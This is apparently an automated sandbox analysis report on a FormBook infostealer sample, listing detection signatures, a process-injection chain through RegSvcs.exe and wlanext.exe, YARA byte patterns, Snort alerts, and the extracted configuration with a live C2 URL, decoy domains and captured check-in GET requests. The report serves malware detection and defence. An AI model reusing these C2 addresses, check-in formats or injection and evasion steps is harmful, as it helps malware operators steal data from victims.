Loading ...

Play interactive tourEdit tour

Analysis Report 00098765123POIIU.exe

Overview

General Information

Sample Name:00098765123POIIU.exe
Analysis ID:411893
MD5:4e2d6ab0c9a56aee76ba33bd26dce9b1
SHA1:52950b4637fc55518efc063ced7bec0867f9051e
SHA256:5e2255d59560c85c4a6c30ffa54e00b2805b584292de464befaf01a614539229
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 00098765123POIIU.exe (PID: 6396 cmdline: 'C:\Users\user\Desktop\00098765123POIIU.exe' MD5: 4E2D6AB0C9A56AEE76BA33BD26DCE9B1)
    • RegSvcs.exe (PID: 6572 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6920 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6940 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hysjs168.com/uv34/"], "decoy": ["lattakia-imbiss.com", "helenafinaltouch.com", "yogamays.com", "habangli.com", "embraceblm.com", "freeurlsite.com", "szxanpet.com", "inspirationalsblog.com", "calibratefirearms.net", "chelseashalza.com", "ihdeuruim.com", "symbolofsafety.com", "albanyhumanesociety.net", "exclusiveoffer.bet", "888yuntu.com", "maraitime.com", "caletaexperience.com", "dreamlikeliving.com", "wolvesmito.club", "zbyunjin.com", "senkrononline.com", "thesugarbasket.com", "organiccbgoil.com", "amazoncor.xyz", "dofus-tr.com", "bhzconstrutora.com", "onlinepaintandsips.com", "sandybottomsflipflops.com", "paobuyingxiong.com", "wokeinteractive.com", "furbabiesandflowers.com", "hellojesse.com", "ssssummit.com", "vaiu-ks.com", "akb48-loveantena.com", "wagsorganics.com", "import-union.com", "sxrqsgs.icu", "72loca.com", "ssc018.com", "jewelta.com", "buildingdigitalmind.com", "pantechinsulation.com", "cobakoreksinjinx.com", "mischurretes.com", "contorig2.com", "julesecurity.com", "soccer-yokouchi.club", "gofourd.com", "holdimob.com", "omorashi-mania.com", "ytksw.com", "gsf-fashon.com", "bogolacke.com", "odislewis.com", "shenzhenmaojinchang.com", "kimsfist.com", "xsites-dev.xyz", "buraktradingltd.com", "muldentaxi.com", "supergurlmarketing.com", "areametalurgia.com", "dejikatsu.com", "pcbet999.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        3.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\00098765123POIIU.exe' , ParentImage: C:\Users\user\Desktop\00098765123POIIU.exe, ParentProcessId: 6396, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6572

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hysjs168.com/uv34/"], "decoy": ["lattakia-imbiss.com", "helenafinaltouch.com", "yogamays.com", "habangli.com", "embraceblm.com", "freeurlsite.com", "szxanpet.com", "inspirationalsblog.com", "calibratefirearms.net", "chelseashalza.com", "ihdeuruim.com", "symbolofsafety.com", "albanyhumanesociety.net", "exclusiveoffer.bet", "888yuntu.com", "maraitime.com", "caletaexperience.com", "dreamlikeliving.com", "wolvesmito.club", "zbyunjin.com", "senkrononline.com", "thesugarbasket.com", "organiccbgoil.com", "amazoncor.xyz", "dofus-tr.com", "bhzconstrutora.com", "onlinepaintandsips.com", "sandybottomsflipflops.com", "paobuyingxiong.com", "wokeinteractive.com", "furbabiesandflowers.com", "hellojesse.com", "ssssummit.com", "vaiu-ks.com", "akb48-loveantena.com", "wagsorganics.com", "import-union.com", "sxrqsgs.icu", "72loca.com", "ssc018.com", "jewelta.com", "buildingdigitalmind.com", "pantechinsulation.com", "cobakoreksinjinx.com", "mischurretes.com", "contorig2.com", "julesecurity.com", "soccer-yokouchi.club", "gofourd.com", "holdimob.com", "omorashi-mania.com", "ytksw.com", "gsf-fashon.com", "bogolacke.com", "odislewis.com", "shenzhenmaojinchang.com", "kimsfist.com", "xsites-dev.xyz", "buraktradingltd.com", "muldentaxi.com", "supergurlmarketing.com", "areametalurgia.com", "dejikatsu.com", "pcbet999.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 00098765123POIIU.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 3.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00098765123POIIU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 00098765123POIIU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.378316502.000000000109F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe, 00000007.00000002.596853586.00000000034BF000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000007.00000002.597849484.0000000003AA7000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000003.00000002.378064218.0000000000EB0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.359826334.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49744 -> 173.236.152.151:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.hysjs168.com/uv34/
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1Host: www.contorig2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1Host: www.muldentaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1Host: www.gofourd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1Host: www.ihdeuruim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1Host: www.embraceblm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1Host: www.ytksw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1Host: www.buraktradingltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1Host: www.bogolacke.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1Host: www.albanyhumanesociety.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1Host: www.sandybottomsflipflops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.217 198.54.117.217
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1Host: www.contorig2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1Host: www.muldentaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1Host: www.gofourd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1Host: www.ihdeuruim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1Host: www.embraceblm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1Host: www.ytksw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1Host: www.buraktradingltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1Host: www.bogolacke.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1Host: www.albanyhumanesociety.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1Host: www.sandybottomsflipflops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.contorig2.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 06:41:48 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 76 33 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uv34/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
